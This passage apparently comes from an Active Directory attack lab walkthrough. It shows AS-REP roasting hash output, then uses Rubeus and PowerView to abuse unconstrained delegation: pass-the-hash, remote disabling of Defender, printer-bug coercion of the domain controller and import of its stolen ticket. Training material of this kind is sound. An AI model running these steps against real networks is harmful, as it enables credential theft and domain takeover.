5D55C0979D8BD882D1DEB58E1E75EB0B46A71651E4DC870143A7B9B13F5082EDB7C4DB3D72A72141
4E733E3AD55BB0FEE2945EFFF2A245EDF2E66ECA3F9BDA51C61600A188B76B59794739015E0DE015
E9D90E922495515D935101CAF88767472F1606D7E1A9426E200C104D0ECF9CB71A3E7FBE78BD927F
23A1DDBFFB01042DCE0F196CB137FC8A7BA83F6D4F124D1F80487AD18FDD2272058D75B4FDDC0046
7877474F3756B54B2E1CA2FB6C68F46A8AC05CF1F412FAC2FA
[*] SamAccountName : VPN178user
[*] DistinguishedName : CN=VPN178User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)
[*] Building AS-REQ (w/o preauth) for: 'dollarcorp.moneycorp.local\VPN178user'
[+] AS-REQ w/o preauth successful!
[*] AS-REP hash:

[email protected]:30666A8BE3487467F601E950F7A5215
7$4AF5198AD80B996034A546B41893AD5AB7C83B06362F9E6C51D909845515500371A634468F304F
8B142580CEDE4AF8AAAB1465BD230F90F28DA538EBB27A143D0D7F97B6F5E029652F0A07DBC67A7E
037867D075CC6B0BE7973DC6FED4258FDE9869C5586061A78167C9FE2A342A64951CB43F70613D8C
3E71345C0716456A850B0CC09B3E827281BCD5738974F2685AB695B8CF3B43B7868125CF05C90AA5
0B4AAE814E811B9B2A75969E6D0574C391F047781FD0046F9BEBF405CF3B11BE6D0BB05577353110
E86D327767A2D3DB5E0EBBC9D39F9934AE209385A6FAD83FE6C8105945ADDAEE01F172D17B9BB95E
2E29CF158CFE97E593B9324373621EF20FF8AAD94D63B93EEA

[*] SamAccountName : VPN179user

[*] DistinguishedName : CN=VPN179User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)
[*] Building AS-REQ (w/o preauth) for: 'dollarcorp.moneycorp.local\VPN179user'
[+] AS-REQ w/o preauth successful!
[*] AS-REP hash:

[email protected]:5999783BCDBC1023B51CF37E3E753AE
5$D5B19283CED991B0B5DF61C65413841FB06283CFD575B659B303A5051CC19F4086954D5ECF92ED
428319D8B3982697F1718C38A0040F4A4089BE8B0FE1FAD60706772D7644FEA00EDE3D5822C4FA63
D9AE96F5D4B4036A93810A8BDFDEBE495D23D6C88381EBB37072DEDEE936D2C3401A96B152DD2687
4C4DA7FADB1C41974B405AB6E494F496954CB6008234FEF3CA6B9CDF3D59908443D1722BA3CF78D8
9049CADEB37EC85CA6ECB3A38F9FFD9D25993FA9C6154F57E6A58E591C029A260B7F9E95DCF35629
46D6AD967A16BF3EC25818A778411AFC1E0E0A13C01E76E92FF260CD0C97EF36968CA7ABF4218A05
FDEA6A80B72D2D22A44111ED55491DB2374C166FDE87E20DED

[*] SamAccountName : VPN180user

[*] DistinguishedName : CN=VPN180User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)
[*] Building AS-REQ (w/o preauth) for: 'dollarcorp.moneycorp.local\VPN180user'
[+] AS-REQ w/o preauth successful!
[*] AS-REP hash:

[email protected]:2C93AF6565544476188C52AFCFB1984
6$D86CBEA94C641E49971FE8A6B22F21F99EBDB3A679FFFEFBB88FAC9E04C4F13DE5735EA4533ECB
79F31DCE2D054F96EEF88D325B3C4CE29481CB4D38AECFDC26CC561A58D889A78EB2AF90A63F0C20
4BBFBCC95866A79D2B870FC2F489487B2DAF10FFE56CB0362CF3A5F51D0A7EE2A7B3305091E56C81
DE2F53671090C7506F84ABA1EF9BB92E6A3FDD2033EC7000DC758DE7C036A4E095A55766B9270A05
B5B415E920C653AAAEDEC3EEE6E6EECD6D3536725BFBCCB5A15E63973514B16FAFE9FE2458789F57
0146F67DD0975692D41099EACFCAA1E32C7879E67A3A358E48D5DDB10F87BED2FE6FB2961881E4F1
4CE3FFFD47C740279D4CF565923095C254ED453E600262B6D3

Kerberoasting - SET SPN

With enough rights (Generic All/Generic Write), a target user’s SPN can be set to anything which is unique
in the forest and then we can request a TGS. The TGS can then be kerberoasted.

Using Powerview to set SPN

Set-DomainObject -Identity <User> -Se @{ ServicePrincipalName = "domain/somestring" }
Kerberos Delegation
By default Windows machines as a security measure does not delegate credentials to a second machine.
This is the Kerberos Double hop issue.

Dates back to Windows 2000 server when Active Directory was introduced. A delegation is a mechanism
to make it possible to re-use an authenticated user’s Kerberos credentials to access another system’s
resource. (AKA impersonation). This was meant to remediate Kerberos Double Hop issue.

Example: WebServer to impersonate a web application authenticated user when accessing/modifying

database records on a backend database server.

Types of Delegation:

• Unconstrained Delegation

• Constrained Delegation

• Resource based Constraint Delegation

Unconstrained Delegation
Unconstrained Delegation allows the first hop server to request access to any service on any computer in
the domain.

Kerberos Authentication flow with Unconstrained Delegation

For our example, we have a user who is trying to authenticate to a backend database through a front-end
web server.

Step-1: AS-REQ: User Authenticates to DC and requests and a TGT

Step-2: AS-REP: DC creates a signed and encrypted TGT and a session key to the user

Step-3: TGS- REQ: User presents the TGT to the DC and requests a TGS for the service (Web Server)

Step-4: TGS-REP: When the DC received the request for a TGS, it checks whether delegation is enabled on
the server running the service. If unconstrained delegation (TRUSTED_FOR_Delegation) is enabled on the
server running the service, it encapsulates the user’s TGT in the TGS. TGS is encrypted with the service’s
NTLM password hash. The TGS and a new session key is sent to the user.

Step-5: AP-REQ: The user presents the TGS to the service (Web Server) which can be decrypted by the
service.

Step-6: The service obtains the user’s TGT and submits a new TGS request to the DC for the database
service on behalf of the user (impersonating the user).

Step-7: The DC presents the TGS to the service (Web Server).

Step-8: The service (Web Server) presents the TGS to the database and connects to the database as the
user, impersonating the user.

Attacking Unconstrained delegation

When unconstrained delegation is enabled on a server for delegation purposes, the server will extract the
user’s TGT and cache it in its memory for later use. Any user with admin privileges on this server can
extract user’s TGT and can request access to any service on the domain.

Attack steps:

1. Enumerate the servers which have unconstrained delegation enabled on them.

2. Try to compromise these servers.

3. Wait or trick any high privileged user to connect to this server and steal the high privileged user’s
TGT.

Enumeration
Using PowerView
PS C:\Windows\system32> Get-DomainComputer -Unconstrained

pwdlastset : 6/13/2024 9:01:43 PM

logoncount : 282
msds-generationid : {183, 46, 151, 148...}
serverreferencebl : CN=DCORP-DC,CN=Servers,CN=Default-First-Site-
Name,CN=Sites,CN=Configuration,DC=moneycor
p,DC=local
badpasswordtime : 5/18/2024 6:19:33 AM
useraccountcontrol : SERVER_TRUST_ACCOUNT, TRUSTED_FOR_DELEGATION
distinguishedname : CN=DCORP-DC,OU=Domain
Controllers,DC=dollarcorp,DC=moneycorp,DC=local
objectclass : {top, person, organizationalPerson, user...}
lastlogontimestamp : 6/26/2024 9:01:33 PM
samaccountname : DCORP-DC$
localpolicyflags : 0
codepage : 0
samaccounttype : MACHINE_ACCOUNT
whenchanged : 6/27/2024 4:01:33 AM
accountexpires : NEVER
countrycode : 0
operatingsystem : Windows Server 2022 Standard
instancetype : 4
msdfsr-computerreferencebl : CN=DCORP-DC,CN=Topology,CN=Domain System
Volume,CN=DFSR-
GlobalSettings,CN=System,DC=dollarcorp,DC=moneycorp,DC=local
objectguid : d698b7ab-f29e-461b-9bc9-24a4a131c92d
operatingsystemversion : 10.0 (20348)
lastlogoff : 12/31/1600 4:00:00 PM
whencreated : 11/12/2022 5:59:40 AM
objectcategory : CN=Computer,CN=Schema,CN=Configuration,DC=moneycorp,DC=local
dscorepropagationdata : {11/12/2022 5:59:41 AM, 1/1/1601 12:00:01 AM}
serviceprincipalname : {ldap/dcorp-
dc.dollarcorp.moneycorp.local/DomainDnsZones.dollarcorp.moneycorp.local,
ldap/dcorp-
dc.dollarcorp.moneycorp.local/ForestDnsZones.moneycorp.local,
Dfsr-12F9A27C-BF97-4787-9364-D31B6C55EB04/dcorp-
dc.dollarcorp.moneycorp.local,
TERMSRV/DCORP-DC...}
usncreated : 12293
usnchanged : 1163850
lastlogon : 7/2/2024 10:08:57 PM
badpwdcount : 0
cn : DCORP-DC
msds-supportedencryptiontypes : 28
objectsid : S-1-5-21-719815819-3726368948-3917688648-1000
primarygroupid : 516
iscriticalsystemobject : True
name : DCORP-DC
ridsetreferences : CN=RID Set,CN=DCORP-DC,OU=Domain
Controllers,DC=dollarcorp,DC=moneycorp,DC=local
dnshostname : dcorp-dc.dollarcorp.moneycorp.local

pwdlastset : 11/11/2022 11:20:51 PM

logoncount : 72
badpasswordtime : 12/31/1600 4:00:00 PM
distinguishedname : CN=DCORP-APPSRV,OU=Servers,DC=dollarcorp,DC=moneycorp,DC=local
objectclass : {top, person, organizationalPerson, user...}
lastlogontimestamp : 6/26/2024 9:01:47 PM
samaccountname : DCORP-APPSRV$
localpolicyflags : 0
codepage : 0
samaccounttype : MACHINE_ACCOUNT
whenchanged : 6/27/2024 4:01:47 AM
accountexpires : NEVER
countrycode : 0
operatingsystem : Windows Server 2022 Datacenter
instancetype : 4
useraccountcontrol : WORKSTATION_TRUST_ACCOUNT, TRUSTED_FOR_DELEGATION
objectguid : ca78344a-f7ac-4888-a371-10933b0e4b80
operatingsystemversion : 10.0 (20348)
lastlogoff : 12/31/1600 4:00:00 PM
whencreated : 11/12/2022 7:20:51 AM
objectcategory : CN=Computer,CN=Schema,CN=Configuration,DC=moneycorp,DC=local
dscorepropagationdata : {11/15/2022 4:17:14 AM, 1/1/1601 12:00:00 AM}
serviceprincipalname : {TERMSRV/DCORP-APPSRV, TERMSRV/dcorp-
appsrv.dollarcorp.moneycorp.local,
RestrictedKrbHost/DCORP-APPSRV, HOST/DCORP-APPSRV...}
usncreated : 13918
usnchanged : 1164052
lastlogon : 7/3/2024 4:11:03 AM
badpwdcount : 0
cn : DCORP-APPSRV
msds-supportedencryptiontypes : 28
objectsid : S-1-5-21-719815819-3726368948-3917688648-1106
primarygroupid : 515
iscriticalsystemobject : False
name : DCORP-APPSRV
dnshostname : dcorp-appsrv.dollarcorp.moneycorp.local

Using AD Module
PS C:\Windows\system32> Get-ADComputer -Filter { TrustedForDelegation -eq $true }

DistinguishedName : CN=DCORP-DC,OU=Domain Controllers,DC=dollarcorp,DC=moneycorp,DC=local

DNSHostName : dcorp-dc.dollarcorp.moneycorp.local
Enabled : True
Name : DCORP-DC
ObjectClass : computer
ObjectGUID : d698b7ab-f29e-461b-9bc9-24a4a131c92d
SamAccountName : DCORP-DC$
SID : S-1-5-21-719815819-3726368948-3917688648-1000
UserPrincipalName :

DistinguishedName : CN=DCORP-APPSRV,OU=Servers,DC=dollarcorp,DC=moneycorp,DC=local
DNSHostName : dcorp-appsrv.dollarcorp.moneycorp.local
Enabled : True
Name : DCORP-APPSRV
ObjectClass : computer
ObjectGUID : ca78344a-f7ac-4888-a371-10933b0e4b80
SamAccountName : DCORP-APPSRV$
SID : S-1-5-21-719815819-3726368948-3917688648-1106

From the output of the command, we could see that Unconstrained Delegation is enabled on the machine
"DCORP-APPSRV". In the Lateral Movement phase, we could find that a user "appadmin" has
administrative privileges on the machine "DCORP-APPSRV". We also were able to dump the hashes of the
user "appadmin".

We will now execute an OverPass the Hash attack to open a command prompt with admin privileges.
C:\Windows\system32>C:\Ad\Tools\Rubeus.exe asktgt /user:appadmin
/aes256:68f08715061e4d0790e71b1245bf20b023d08822d2df85bff50a0e8136ffe4cb /opsec
/createnetonly:cmd.exe /show /ptt

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
 v2.2.1

[*] Action: Ask TGT

[*] Showing process : True

[*] Username : LV79YTVQ
[*] Domain : XCVK7KMS
[*] Password : SI56X9J5
[+] Process : 'cmd.exe' successfully created with LOGON_TYPE = 9
[+] ProcessID : 4316
[+] LUID : 0xe46398

[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)

[!] Pre-Authentication required!
[!] AES256 Salt: DOLLARCORP.MONEYCORP.LOCALappadmin
[*] Using aes256_cts_hmac_sha1 hash:
68f08715061e4d0790e71b1245bf20b023d08822d2df85bff50a0e8136ffe4cb
[*] Building AS-REQ (w/ preauth) for: 'dollarcorp.moneycorp.local\appadmin'
[*] Target LUID : 14967704
[*] Using domain controller: 172.16.2.1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

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
[*] Target LUID: 0xe46398
[+] Ticket successfully imported!

ServiceName : krbtgt/DOLLARCORP.MONEYCORP.LOCAL
ServiceRealm : DOLLARCORP.MONEYCORP.LOCAL
UserName : appadmin
UserRealm : DOLLARCORP.MONEYCORP.LOCAL
StartTime : 7/3/2024 6:46:37 AM
EndTime : 7/3/2024 4:46:37 PM
RenewTill : 7/10/2024 6:46:37 AM
 Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : aes256_cts_hmac_sha1
Base64(key) : 38JnKT8GkQdy2H4fAAtios6qz7HioRdWViXHfp0uTU0=
ASREP (key) : 68F08715061E4D0790E71B1245BF20B023D08822D2DF85BFF50A0E8136FFE4CB

A new command prompt with appadmin privileges opens. We will first disable Defender on the machine.
C:\Windows\system32>C:\Ad\Tools\InviShell\RunWithPathAsAdmin.bat

C:\Windows\system32>set COR_ENABLE_PROFILING=1

C:\Windows\system32>set COR_PROFILER={cf0d821e-299b-5307-a3d8-b283c03916db}

C:\Windows\system32>set COR_PROFILER_PATH=C:\AD\Tools\InviShell\InShellProf.dll

C:\Windows\system32>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Windows\system32> Invoke-Command -ComputerName dcorp-appsrv -ScriptBlock {

$env:username;$env:computername }
appadmin
DCORP-APPSRV
PS C:\Windows\system32> Invoke-Command -ComputerName dcorp-appsrv -ScriptBlock { Set-MpPreference
-DisableRealtimeMonitoring $true }
PS C:\Windows\system32> Invoke-Command -ComputerName dcorp-appsrv -ScriptBlock { Set-MpPreference
-DisableBehaviorMonitoring $true }
PS C:\Windows\system32> Invoke-Command -ComputerName dcorp-appsrv -ScriptBlock { Set-MpPreference
-DisableIntrusionPreventionSystem $true }
PS C:\Windows\system32> Invoke-Command -ComputerName dcorp-appsrv -ScriptBlock { Set-MpPreference
-DisableIOAVProtection $true }

Now the next step is to track a high privileged user to connect to the machine dcorp-appsrv so that we
can get the TGT of that user. For this, we will copy Rubeus on the machine dcorp-appsrv and open it in
monitor mode.
PS C:\Windows\system32> Invoke-Command -ComputerName dcorp-appsrv -ScriptBlock { ls
C:\Users\Public }

Directory: C:\Users\Public

Mode LastWriteTime Length Name

PSComputerName
---- ------------- ------ ---- ------------
--
d-r--- 11/11/2022 12:53 AM Documents dcorp-appsrv
d-r--- 5/8/2021 1:15 AM Downloads dcorp-appsrv
d-r--- 5/8/2021 1:15 AM Music dcorp-appsrv
d-r--- 5/8/2021 1:15 AM Pictures dcorp-appsrv
d-r--- 5/8/2021 1:15 AM Videos dcorp-appsrv
-a---- 2/1/2024 1:25 PM 201216 Loader.exe dcorp-appsrv
-a---- 12/12/2022 5:02 PM 1039872 Rubeus.exe dcorp-appsrv
PS C:\Windows\system32> Enter-PSSession -ComputerName dcorp-appsrv
[dcorp-appsrv]: PS C:\Users\appadmin\Documents> C:\Users\Public\Rubeus.exe monitor /interval:5
/target:dcorp-dc$ /nowrap

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.1

[*] Action: TGT Monitoring

[*] Monitoring every 5 seconds for new TGTs

Once the Rubeus is configured in monitor mode, we can use the printer bug to trick any high privileged
user to connect to a machine with Unconstrained Delegation.

A feature of MS-RPRN allows any domain user (Authenticated User) can force any machine running
Spooler service) to connect to a second machine of domain user’s choice.

For our scenario, we will force the domain controller to connect to the machine dcorp-appsrv.

In a new command prompt opened with our normal student privileges, we run the following command.
C:\Windows\system32>C:\Ad\Tools\MS-RPRN.exe \\dcorp-dc.dollarcorp.moneycorp.local \\dcorp-
appsrv.dollarcorp.moneycorp.local
RpcRemoteFindFirstPrinterChangeNotificationEx failed.Error Code 1722 - The RPC server is
unavailable.

In the Rubeus monitor we received the TGT.

[*] 7/3/2024 2:32:31 PM UTC - Found new TGT:

User : [email protected]
StartTime : 7/3/2024 7:32:28 AM
EndTime : 7/3/2024 5:32:28 PM
RenewTill : 7/9/2024 10:01:43 PM
Flags : name_canonicalize, pre_authent, renewable, forwarded, forwardable
Base64EncodedTicket :

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
9SUC5MT0NBTA==

[*] Ticket cache size: 1

We get the TGT of the dcorp-dc$. We will now pass the TGT to a command prompt session with Rubeus.
C:\Windows\system32>C:\Ad\Tools\Rubeus.exe ptt
/ticket:doIGRTCCBkGgAwIBBaEDAgEWooIFGjCCBRZhggUSMIIFDqADAgEFoRwbGkRPTExBUkNPUlAuTU9ORVlDT1JQLkxPQ
0FMoi8wLaADAgECoSYwJBsGa3JidGd0GxpET0xMQVJDT1JQLk1PTkVZQ09SUC5MT0NBTKOCBLYwggSyoAMCARKhAwIBAqKCBK
QEggSgKJKYGhtF9fgTkiRJRVEdA1cVV4ZziCWJzjINkiDeaWzLkc7olzCRxtodX/HFQ3zPpib7uA+DMH6Vy1J+Ygk+b4IXif8
Cv/5FM2MzXj2pPnFlaNqPso+o4RwdSWFOHQrENWmE+6BGSonxj004jOJnEE1BjZArbGjemnDp4PnDvilDxY8OFfj4oA1zAfVm
1lRABHVlAWtmk9e5Swj3Yt2KU2kmQ4oBN/N+plOPyUsgDGj4VEFZGA2ve2gXjzRZAc7W78eQzuRq8V30HJcrW47v5yG1AMob3
1dfc1Iny2IjoQi5pcIkU10tJg3VyMRgNEXkmPr19V/mBONMMZCueoZfHN0jB1s6BgPeXdvQmeB3NQ4FW8aaQs1WW8i5NrafoS
SR2uBo3ZjUGpkDzrUDhqxPOmz0tyLCafX2E79EBgoNXWcLLuWpqAdHZgA0iiUeZtc1y3GpfEbkqTM2mvUvne4LYbORaVANfEs
Ys9f+ZxDDj7upHqAESeqt0V3Sz3h1HQJ7HWbi1K0LO7/Rmj3LTDCwbztAEyxoPbydwg8X5bL/maE4kI/nMjPmi/EA76hOINBv
8XSGVdxwa6UGDXP16KmnyY6x57H8AUQv7/iblmqhxPrnmCxJTKvmfBjqVqvPbe0j9k4uT9rZaY3g0LNl+Pp+o+xxfQxoepJie
1c9/yBZvJhfD5005RXmkwdMmi4FDVlwaGHHFzEaLjFufQhLyeuYToF347ZtoEEJAtOxhFNmtCjSps3V2Lr+5Pd10+FuGu8gfG
Yg5I9UGMrt6/LMgGmA4kpIqg3U8ToaCFRnj9bZ7i2yhQIFKbYqRKnbJCpHQypBvdqQN0/gVbwIJibbETa9Po9xvtruMwrHUrl
KTaN4mhNlLytcMG6RL1SZoXcG3l0iTz6Cs37wba/UJETRiR1MpMYBTAnT+AFMu9DTs/tnYfc3nGJXN5I4rITczByBUadln+H3
ah7lCGgLRlawhI8trIvENO74hReD8BMqdXS1SY0W+cAgJZwjAc/Gt2gSmKA1CRr6s0FrzP9jjLQSgT8+JDlR32LPdFuMOszjN
0k67uo3mWcrPfbHfwwFOp7Ssx0zE35Z0ELeo5RItIdZGz59n7o5StX1kFFfQESDT8NZOLhooGOZGp38arcf3ElaEsRcH3r37q
kCDv/4WcqwfuMMPL09ZfFkeDpH9sNDwiVdl8TQcJ+90NzdPVL7xOz8pFQaCg3wWXwX+Bgf72nG1kRQqCVTvcSDjNTgLIYyWsx
HOnDEcNohDF/A7CllE23d2DEjBwdd2atavJ2AupdnCWCFQ8f0pqy4ySDydtOjWdBvIl8rKFShVgd6AYKRiiw7s1ot8ZBuc82p
oz8kRqj21KpA6bATVJYeBdCMg5dj8ONeIpyDT+BPfstEVaXWOU+Bk2j28yNfssoPCRE2i34IySHjSlRwLuOV70wgflD5M4xVO
7aklDlkDPeVS40kHUHAsQchM7Y/bhZmqas41I5BDLddwwgRZk2zqqWEkPLIvCYoFXL55UmecdoWbcPJVUTP7nVwUw8udaLxoi
CuilpaEWKVzsNGbq1mNiyFg3kUTf/b9a+jggEVMIIBEaADAgEAooIBCASCAQR9ggEAMIH9oIH6MIH3MIH0oCswKaADAgESoSI
EIEqM0znZ/RJ2+wDRYPZXJcROlWohbAyQ8IvyhEoYw3hzoRwbGkRPTExBUkNPUlAuTU9ORVlDT1JQLkxPQ0FMohYwFKADAgEB
oQ0wCxsJRENPUlAtREMkowcDBQBgoQAApREYDzIwMjQwNzAzMTQzMjI4WqYRGA8yMDI0MDcwNDAwMzIyOFqnERgPMjAyNDA3M
TAwNTAxNDNaqBwbGkRPTExBUkNPUlAuTU9ORVlDT1JQLkxPQ0FMqS8wLaADAgECoSYwJBsGa3JidGd0GxpET0xMQVJDT1JQLk
1PTkVZQ09SUC5MT0NBTA==

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.1

[*] Action: Import Ticket

[+] Ticket successfully imported!

C:\Windows\system32>klist

Current LogonId is 0:0x5631f

Cached Tickets: (1)

#0> Client: DCORP-DC$ @ DOLLARCORP.MONEYCORP.LOCAL

Server: krbtgt/DOLLARCORP.MONEYCORP.LOCAL @ DOLLARCORP.MONEYCORP.LOCAL
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x60a10000 -> forwardable forwarded renewable pre_authent name_canonicalize
Start Time: 7/3/2024 7:32:28 (local)
End Time: 7/3/2024 17:32:28 (local)
